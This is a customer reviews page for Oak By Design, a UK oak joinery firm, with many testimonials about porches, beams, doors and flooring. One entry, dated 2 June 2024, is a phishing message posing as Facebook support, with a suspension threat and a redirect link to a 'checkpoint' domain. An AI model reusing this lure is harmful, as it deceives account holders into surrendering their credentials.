Oak By Design - Reviews and Testimonials
oak by design
oakbydesign
01423 593 794
oak by design

Facebook Reviews

"Don't just take our word for it..."
oak bicycle
facebook
Geeta Agrwal Geeta Agrwal
recommends
2 June 2024

Dear Oak By Design, We have identified activities in your account that may constitute a breach of our Terms of Service concerning unauthorized access attempts. To prevent any disruption in your account usage, you are required to verify your identity. Please confirm your identity by clicking on the link below: ◉https://facebook.com/l.php?u=https%3A%2F%2Fcheckpoint-01652326594168.com If you do not complete the verification within 48 hours, your account will be temporarily suspended for security reasons. These precautions are taken to safeguard our users and their information. Thank you for your cooperation in maintaining the security of our community. Sincerely, Customer Support © 2024 Social Network Inc.

facebook
Kirsty Kirby
recommends
20 May 2024

Oak by design have been absolutely fabulous from start to finish. Nothing was to much trouble, and Joanne was a delight to work with on helping me bring my ideas to life with our oak porch. When we ran short of oak pegs and of oak panels to finish our over hang, they were absolutely fantastic, they provided the extras no questions asked and extremely prompt! When the trusses of our porch arrived damaged, presumably damaged in transit, they didn’t mess around in trying to figure out who to blame they just got to work immediately creating the replacements and sent them out immediately, they were here in a matter of a few days, which was absolutely fabulous. No messing around, or trying to pass blame, but straight to fixing the issue avoiding any hold ups for us! (Hard to come by nowadays!) When we were unsure on how to assemble the windows in our porch, the team at oak by design were fab! My other half went to their show room and they took him to the lads in the back who create these fabulous porches and they showed him exactly how to do it. They were so helpful and welcoming when we felt like wallys going back several times for bits and bobs. I would recommend them to anyone and they will certainly be my go to for any future extension work with oak! Thank you so much again to Joanne and all the team at Oak by Design.

facebook
R Brown Carpentry & Property Services
recommends
2 January 2024

I first used Oak by Design in 2021 for a oak porch, I used them again 2023 for an oak pergola. Both times my clients have been Delighted with the finished product. Both times the product was delivered when stated, everything i needed was on the delivery. Oak by design listened to what I required for both jobs. The quality of the oak is excellent, all joints fit correctly & if I had a problem I only had to ring and speak to them. R Brown Carpentry always recommends Oak by Design when asked about oak structures.

facebook
Joyce Stallebrass
recommends
30 November 2023

From the start of our enquiry, the service provided was excellent. Joanne was a great help and the oak porch structure looks fantastic on our new build. It completely changed the look of the house. Very quick delivery. Very highly recommended.

facebook
Natalie FN
recommends
22 June 2023

We are extremely happy with the porch from this company! Joanne was amazing and spent so much time explaining everything and making sure things were right. Would certainly recommend!

facebook
Phil Elbourne
recommends
11 May 2023

Fantastic service and quality of product. I couldn’t be happier with my Oak porch, which was designed to my specification with the minimum of fuss. Joanne was so helpful and nothing was too much trouble. Incredibly well engineered and looks fantastic. Thank you so much.

facebook
Debbie Dawson
recommends
1 November 2022

I wanted to thank Amanda and the team at Oak by Design for the outstanding service and particularly the beautiful porch that has been created. Throughout this process you have been professional, attended to detail and the product is testament to this. By recommending Jack as the builder we were able to have a great all round product from start to finish.

facebook
Hah Sedgefield
recommends
20 October 2022

Great professional service from design to delivery. Would highly recommend them

facebook
Eloise Horsley
recommends
7 June 2022

5 stars for this company. Both Jo (whom I liased extensively with) and the team gave us faultless service. It was a complicated design interlocking the porch roof with the main build. Even when we (by that I mean me) worried about how it would all come together. This included several drawings and measurements till we got everything exactly right, right down to the inscription on the beam which for us made the porch even more special. You really won’t be disappointed my many questions were always answered in a timely and friendly manner. I couldn’t recommend them enough and I think the evidence is there in the picture my vision and their skill along with our other contractors did an amazing job of bringing my dream to life. Many thanks once again.

facebook
Fiona Bowling
recommends
24 February 2022

I have used oak by design twice now, the first time for a bespoke oak beam and fire surround and more recently for an RSJ cover. Joanne is great at attention to detail and advised me on the shaping of the cover, colouring and fitting. The after service was great. We had a hiccup fitting the cover ourselves. Darren who made the cover rang me straight back and explained how to fix the problem. I wouldn't hesitate to buy anything from this company the workmanship and customer service is first class..Thankyou 😊

facebook
Justin Dunn
recommends
10 December 2021

At the beginning of this year we worked on our second project with Oak by Design; a garden room made out of oak and glass. The whole team were brilliant. Joanne is superb liaising between us and the technical team. The product was amazing and we are just so pleased with the result. As I said, this is our second project that’s been successfully completed and we would never look any further for a wonderful company to partner with. When it’s your home, it’s very personal and the effort the team took to understand what the perfect look would be was outstanding and our vision became a reality for which we are hugely appreciative of.

facebook
Roger Cole
recommends
7 December 2021

I’ve used Oak By Design for years, while slowly replacing internal doors and various bits and pieces in and around the house. Their goods are great and their service is even better. An engaging lovely team of people, happy to be doing what they do, focused on delivering a quality product that satisfies their customers. With a big shout out for Joanne who has helped me sort some out some pretty vague and odd requests over the years.

facebook
Nathalie Gudgeon
recommends
11 October 2021

So happy with our canopy from Oak by Design, beautiful wood and really good communication

facebook
Emily Coticelli
recommends
28 September 2021

This is the second time we have used oak by design. We first used them for an oak staircase, and more recently for oak Rsj covers. We received really good advice and pictures to help us choose the finish and the order was delivered on time. The customer service and follow up was also very good. The covers were simple to install but very heavy so needed plenty of manpower. You can’t see the joints - very well crafted and lovely quality oak.

facebook
Simon Spence
recommends
12 October 2020

This is the second time that we have used Oak By Design for oak products and once again we weren’t disappointed. We recently ordered some internal oak doors and from the very start they were a pleasure to deal with. Joanne especially was extremely helpful and friendly, nothing was too much trouble. We were kept updated about the progress of our order. Unfortunately we needed to delay acceptance of the doors for a few weeks and Oak By Design happily agreed to store them in their workshop until we were ready for them. The quality of the doors is very high, they are very well made and finished, far better than any oak doors that you will buy “ off the shelf. “ They are all installed now and look fantastic. I would highly recommend Oak By Design and we will certainly use them again in the future if we require any more oak products. A huge thank you to Joanne and the whole team for a great service and a great product.

facebook
Pamela Douthwaite
recommends
28 September 2020

Excellent planning advice,kept very well informed about the progress of our Porch and finally the installation by a very good builder that they had recommended.

facebook
Keran Pincombe
recommends
17 September 2020

A truly fantastic company!!! The whole process of getting an oak porch by OakByDesign has been outstanding from the start. Joanne has been very helpful from the initial design process, installation and courtesy calls after the porch was completed. After a few amendments on our own design they came to do the final measurements and then a few weeks later they came to install. We are so pleased with the result, the quality and the finish of the product. It is truly beautiful and everyone including tradespeople coming to work at the house, have commented on the quality. Thank you!

facebook
Gill Wren
recommends
10 January 2020

We would 100% recommend Oak by Design, having used them to create an oak framed enclosed porch for us. Joanne and the team have been fabulous to deal with and they have produced a beautiful quality product which we are so pleased with! Many thanks to Joanne and the team for making our vision a reality!

facebook
Jacqueline Corcoran-Burton
recommends
26 May 2019

Oak by Design have been an incredible company to work with. They listened to our ideas and produced some outstanding work. I had 4 RSJ covers made and 2 fireplace mantles. Joanne at the company talked us through the whole process. She was brilliant, friendly and really knew her stuff. The oak looks like solid beams and we couldn't be happier. We would highly recommend this company, they have been amazing. Thanks guys x

facebook
Katharine Trofimowicz
recommends
17 October 2018

Fantastic quality and service at a fair price. Oak by Design made a beautiful oak porch for our new build which gives it the 'wow factor' we were hoping for. It is the first thing every visit comments about..... we couldn't be happier with it.

facebook
Alistair Johnson
recommends
1 January 2017

A great company with a first class team that really does make a difference to the end finish!

facebook
Debs Mossman
recommends
14 December 2016

We deal with Joanne on a regular basis, she is amazing and their team is too. Fantastic products, nothing is a trouble for them. Many times this year they have helped us out at last minute. We can't thankyou enough. We look forward to continuing our great rapport with you in 2017. Have a fab xmas and new year. all of you, Joanne you are brilliant! Debs & Mick of Bankhouse Stoves in Northumberland.

facebook
Craig Nelson
recommends
24 November 2016

Highly recommend company, professional service from start to finish and the beam I purchased was beautiful and made exactly to my spec.

facebook
Tudor Townsend
recommends
7 August 2016

We needed an oak beam cover to hide a complicated RSJ structure. The staff at Oak by Design were very knowledgeable and helpful to ensure the cover was manufactured to match the existing beams. I was even able to visit the works to get the style and colouring just right. We are delighted with the end result which has received many compliments. Additionally we purchased oak board flooring which looks just great. We plan to buy more for the next stage of the project.

facebook
Suzette Love
recommends
23 May 2016

Extremely pleased with our recent order for an oak beam to be used in our kitchen. Well made exactly to our specifications, of good quality and at a competitive price. Great customer service throughout with consultation at each stage of manufacture. Speedy service and very well packaged for delivery. Would not hesitate to use Oak by Design in the future.

facebook
Graham Penny
recommends
5 May 2016

How rare it is today to find a company, who not only understands the true meaning of customer service but has the ability to prove it. There help in choosing the design to meet my needs coupled with the consideration shown in the construction, installation and finish was fantastic. I highly recommend this company. Graham Penny

facebook
Andrew Ming
recommends
5 May 2016

From when we visited their Harrogate showroom to the fitting and completion of our oak orangery the staff could not have been more professional. They came up with some great ideas and we are extremely pleased with the finished product. Great quality.

facebook
Hayley Louise
recommends
13 February 2015

Fabulous beams, top quality and great customer service!

crossmenuchevron-downquestion-circle
Jeremy Smith
Jeremy Smith

Left us a 5 star review

Great service by a friendly professional team, a pleasure to work with. The end result of our oak glazed leisure spa and outdoor kitchen looks fantastic. Great job

Fantastic service and quality of product. I couldn’t be happier with my Oak porch, which was designed to my specification with the minimum of fuss. Joanne was so helpful and nothing was too much trouble. Incredibly well engineered and looks fantastic. Thank you so much.

I first used Oak by Design in 2021 for a oak porch, I used them again 2023 for an oak pergola. Both times my clients have been Delighted with the finished product. Both times the product was delivered when stated, everything i needed was on the delivery. Oak by design listened to what I required for both jobs. The quality of the oak is excellent, all joints fit correctly & if I had a problem I only had to ring and speak to them. R Brown Carpentry always recommends Oak by Design when asked about oak structures.

Fantastic service from start to finish, I would have no hesitation in recommending this company or using them again. Very professional and helpful. Joanne was great in assisting us with choosing both styles and colours of the beams and cladding.

We can thoroughly recommend Oak by Design. Not only did they provide the best of oak floors and oak staircase to suit our new, contemporary home, but they returned to make good a problem which was not their fault. Going the extra mile separates great companies from ordinary firms. Thank you Jamie & Billy. From Mike & Barbara, York.

I firstly used oak by design a couple of years ago for an open oak porch. They were extremely helpful and everything was delivered on time to the highest quality. The porch went together with the oak dowels provided and looked great when it was all slated in. They have also supplied me with a oak beam for a fireplace natural random finish and it looks good.

My wife and I recently purchased an oak porch from Oak By Design. We are delighted with the porch and it has been much admired. We did get some help assembling it but everything fitted together perfectly.

A first rate service from start to finish. We've used this company in the past for our floor - 40 foot of solid oak! 2 beams and 2 RSJ covers. This time a beam for our new kitchen inglenook and another RSJ cover. More than impressed with the products which more than met our spec. A very friendly and helpful team who I'd recommend to anyone.

Ordered an oak mantle beam from Oak by Design and they quickly called to check the finer details. Unfortunatly, the beam was slightly damaged on arrival by the courier company. Oak by Design immediately arranged to have it picked by DHL, transferred back to Yorkshire from Kent, repaired and sent back within 2 days, with no quibbles. The beam is beautiful, as is the high quality customer service by these people. Fully recommend using this company. Anthony Slater, Tonbridge. Tonbridge.

Oak by Design were extremely helpful at all stages of my project from helping and advising me to choose the most appropriate beam through to advice on fixing the beam. They were extremely patient with changes to my beam dimension requirements finally providing a solution to suit my project. They provided photographs on completion of the beam prior to dispatch to ensure that my requirements had been met. I was extremely impressed by the quality and finish of the beam which has become the focal point for my fireplace project. Oak by Design provided customer care of the highest quality and I would highly recommend their services.

Great personal service to ensure we got what we needed specific to our personal requirements. Quality is outstanding and there was a helping hand there all the way. The porch we ended up with was not cheap but having looked at others the quality of the Oak by design product shines through. Very pleased with the result and the complements from both neighbours and our builders keep coming.

My client was looking for ways in which to make his conversion (of an early seventies house into a period family farmhouse) “stand out from the crowd”. whilst maintaining a commercial eye on his expenditure, as the house was being converted for resale profit. Making the choice to meet with Richard and explore possibilities for incorporating some Real solid Oak features into his plans proved to be the making of the project. By taking lots of advice from Richard on both the size and structure of the components we were able to incorporate three key features. The beautiful and bold roof trusses and purlins for the open plan kitchen are simply a joy to behold. The stunning full height gable window which is directly glazed into the large framework can be appreciated from both the the kerbside and of course from within the cosy snug on the ground floor or the amazing first floor main bedroom where we incorporated some additional exposed roof beams just purely for effect. All in all it is fair to say that these significant choices certainly created the wow factor my client was looking for. Having managed to pre sell the property well before completion it in itself demonstrates the benefits of keeping these sorts of real oak features as part of a modern build. I have no hesitation whatsoever is saying that if anyone is looking to get advice and is serious about investing in quality oak products they should have no need to look further than Oak by Design. Thanks again Richard for all your help , guidance and continued support which is a credit to you and the craftsmen you employ.

Oak by Design have made 2 oak framed rooms for us, sunroom at the front and and "moonroom" (photo) at the back which encompasses a shower room, work area and storage. They have been helpful at every stage and the outcome is simply brilliant. They make the whole house feel roomier and brighter and are beautiful places to be. GE North Yorkshire

As the owner of a local joinery business, Robert Davis Joinery, I have had the pleasure of using Oak by Design on several occasions over the last 8 years. They have produced bespoke interior products for me including Oak doors and timber moldings. The staff in the office and the workshop are always very helpful and friendly and the standard of the workmanship and materials are always of a very high quality.

A great company to deal with. Professional from start to finish and always there to assist with any queries. Highly recommended.

Exceptional service and beautiful flooring. Absolutely delighted with every aspect. Went above and beyond great customer service to meet our needs and timescales.

Spectacular service from start to finish! great design work and support from concept to installation. The builders were amazing! So pleased with the outcome! Thankyou so so much !

Working with Oak By Design on our project was a pleasure and we were delighted with the results. Joanne was extremely helpful, quick to answer any questions and generally a great person to deal with! The quality and finish of the products - RSJ covers and Oak Windows & Doors were superb and look great. Would highly recommend working with Oak By Design and would not hesitate to use their services again for future projects!

Marvellous place, so many wonderful things made from wood.

Very professional. Excellent product and service. Highly recommended.

We are ‘over the moon’ with our beautiful oak porch made by Oakbydesign .From our initial enquiry to delivery and installation the service and attention to detail has been outstanding! A very big thank you to Joanne who was so helpful and friendly from start to finish which made the whole process such a pleasure. Highly recommend anyone looking for an oak porch to choose Oakbydesign . Yvonne Grant.

I wish I could give more starts!! We looked at many companies before finally choosing Oak by Design. We are so glad we chose them. They were excellent from start to finish. They worked with us to find a workable design that was to our liking. Our door looks amazing (despite the building site that still surrounds it!). Their customer service is of the highest standard, Joanne could not do enough to help us. I would not hesitate to recommend them.

I was sourcing an oak RSJ cover (circa 5m length) for my extension and found Oak by Design on the internet. All of the reviews I could were glowing and so I contacted them......And I'm so glad that I did. Joanne Fisher answered my initial call and she looked after my order from beginning to end - in terms of ensuring that I got exactly what I wanted she/they provided a superb service - everything on time - delivery in to the Peak District to suit when I wanted. The quality of the the RSJ cover is fantastic thick solid oak that matches my oak floor - looks amazing. If you want anything oak I can thoroughly recommend Oak By Design.

We were looking to have a bespoke oak and glass atrium for the front of our new house renovation. We wanted to find a company we trusted, who clearly understood our brief and could manufacture and install a high quality product at a competitive price. A big ask, but OakByDesign ticked all our boxes. Jamie and the team from the initial discovery meeting to completion of the installation were fantastic. The design, material quality and installation were first class and I would highly recommend you to include them within your project plans. Thank you all. Ben and Lindsay.

When embarking on a large renovation project assembling the right team of skilled work people is vital. It involves the need for skill, imagination and trust. It was important to us to use a local company and Oak by Design seemed to tick the right boxes although we had not dealt with them or indeed heard of them before. We soon came to realise that the combination of Ben, Billy, Jamie, Matt and MIck ( listed strictly in alphabetical order ) was a great success. Skilled: highly, imaginative: an excellent creative talent, trustworthy: 100% but also such great team players that all the other trades on site benefitted from their cooperation and great good humour. I would endorse the other reviewers who have commented on the quality of the materials used, whether in the replacement windows, the light oak internal doors. the fantastic oak staircase, the secret bookcase and the pièce de résistance: the oak conservatory. It has been a great project and much of that I attribute to the work of Oak by Design. A big thank you to you all.

What can I say, Oak By Design have been the most fantastic company to deal with. Joanne was so helpful, friendly and professional. She really seemed to care about our project, which made such a difference. We had 4 oak RSJ covers made and 2 fireplace mantles. The finish is outstanding. Everyone believes they are solid beams, which was just what we wanted. The care and attention this company will give you is 2nd to none and I would highly recommend them. Pictures will follow when we complete our project, thanks again Oak By Design. x

Very impressed with Oak By Design. Customer service is fantastic and they were very patient in helping me ensure what I needed was the right size. Photos sent of oak cover before it was sent to me and end product was great. It was also not the most expensive either. Would definitely recommend.

From the initial quotation right through to the delivery and after service Joanne has been brilliant and given me an excellent product. I have just ordered another porch for another project from them and I will continue to do so for future projects . Thomas and Bell Building Contractors Ltd

This is the second time that we have used Oak By Design for oak products and once again we weren’t disappointed. We recently ordered some internal oak doors and from the very start they were a pleasure to deal with. Joanne especially was extremely helpful and friendly, nothing was too much trouble. We were kept updated about the progress of our order. Unfortunately we needed to delay acceptance of the doors for a few weeks and Oak By Design happily agreed to store them in their workshop until we were ready for them. The quality of the doors is very high, they are very well made and finished, far better than any oak doors that you will buy “ off the shelf. “ They are all installed now and look fantastic. I would highly recommend Oak By Design and we will certainly use them again in the future if we require any more oak products. A huge thank you to Joanne and the whole team for a great service and a great product.

Excellent customer service. Very friendly. Explained in detail. Product is beautiful. Would recommend. Company sent photos of finished product prior to dispatch to confirm our happiness with their work.

Oak by design were a fantastic company to deal with. They made us some treads for a bespoke stair case from large pieces of air dried oak. They were very thorough in making sure that they understood exactly what we wanted. They made excellent suggestions for small changes to our own design in order to produce a better finished product and to manage the cost. We were very happy with the treads when they were delivered. They look fantastic and fitted perfectly to the steel frame which was made by a third party. I could not recommend them more highly.

First class service and product . Our car port and steps look fantastic and blends in with the existing buildings beautifully. Would definitely recommend them.

Perfect from start to finish. The service is above and beyond. Pleasure to install

Firstly, the product quality was superb, a beautiful oak mantle piece for my fire place, gorgeous. The installation was quick, efficient and fitter very friendly. The price was very reasonable, actually very good value. But what makes it all SIX STAR, ( but we I can only give 5!), was the customer service. When walking in the shop I was perfectly attended to, I was given samples to take home and they remembered to call soma days later to see what I thought. Order to install time was very fast for such a bespoke service. My experience was world class, great to deal with a brilliant local/small business, I totally recommend.

We ordered two bespoke doors and two bespoke porches for our house build from Joanne at OByD. We were specifically delighted with Joanne's attention to detail (and patience! lol) making the overall customer experience excellent. The product was equally fantastic, the product quality was truly beyond our expectations. Joanne is super helpful and knowledgeable, and kept my spirits up throughout our project. We would 100% recommend OByD, and specifically Joanne, for all your standard and bespoke oak requirements. H&D

Found this company by accident whilst passing through Harrogate, but well worth a visit.Great products choice with helpful friendly service. The wooden flooring and beams look great in situ and we are very pleased with the transformed room. Would recommend and use again.

Found Oak by Design searching for a new front porch to replace a canopy and knew immediately that this was company for the job and I was not disappointed. I already knew what I wanted and Richard, very patiently, developed my basic requirements, with a number of iterations, into a full detailed design. As I live outside their site working area I decided go for supply only and to install the porch myself. It was delivered as promised and it looked great even on the pallet! It took me a while to fit but it was very satisfying and the result is fantastic. The quality of the aged oak and carpentry of the timbers is excellent. I’m delighted with the porch supplied by Oak by Design - it looks superb.

We decided to get an oak porch to make our home more attractive and we are so glad we did as it really is beautiful ! Joanne and the Team have been professional, friendly and just a pleasure to deal with ! Thank you so much !!

Having lived with our porch for over 2 years I can honestly say it’s the best addition to our house we ever made. Not only does it look fantastic the quality is outstanding. I love that it keeps the mud out of the hall and provides a seating area to remove muddy boots.

Amazing customer service from beginning to end . My builder was in awe at the quality of the oak porch components. Call them and ask for Joanne - what she doesn’t know isn’t worth knowing! It’s not every day you invest in a “proper” porch so do it right. You’ll definitely be delighted!

Really delighted with the new porch by Oak by Design. It adds a super feature to my converted barn. Thanks to Joanne and the team.

A fabulous service and supportive through the design and delivery process. Highly recommended

From the start of our enquiry, the service provided was excellent. Joanne was a great help and the oak porch structure looks fantastic on our new build. It completely changed the look of the house. Very quick delivery could not recommend enough.

We purchased some engineered oak flooring and oak covers from Oak By Design and couldn't be happier with the finish and quality. They are spot on. Joanne was extremely helpful throughout the whole process and provided plenty of advice when necessary. Thank you

Amazing craftsmanship from this company. The customer service from Joanne was superb. My questions and indecisiveness were never an issue and she was always on hand to offer advice and find the answers to my questions. Our oak porch has transformed the house and we are over thd moon with it. Would highly recommend Oak By Design. Joanne is an asset to the sales and promotion of this company and is very knowledgeable. Would give 10 stars if I could!

Great company, always on the end of the phone to talk through design, measurements, fitting. The Oak is very high standard, looks amazing.

From start to finish Oak By Design have been incredible, nothing was too much trouble. Our new Oak doors are beautifully made and have really been the icing on the cake to finish our house renovations off. We have also had a fabulous outdoor oak structure with heating and we are very much looking forward to making the most of it in the months ahead. Thank you to the whole team I would throughly recommend.

From the moment we visited the Oak Design showroom, we knew that we were dealing with a top quality local company. Richard the owner, showed us around his design works with real pride of his product and service offering. Jamie as sales executive has discussed and agreed the options & design with costs to us and we have now implemented the first phase of our home improvement, with more work to follow. We are highly delighted with the finished product and would strongly recommend Oak Design to other interested clients. I also suggest that you pay them a personal visit at the Home Building & Renovation exhibition in Harrogate, as well as their wonderful showroom of Oak Solutions in Tockwith to get a personal guided tour.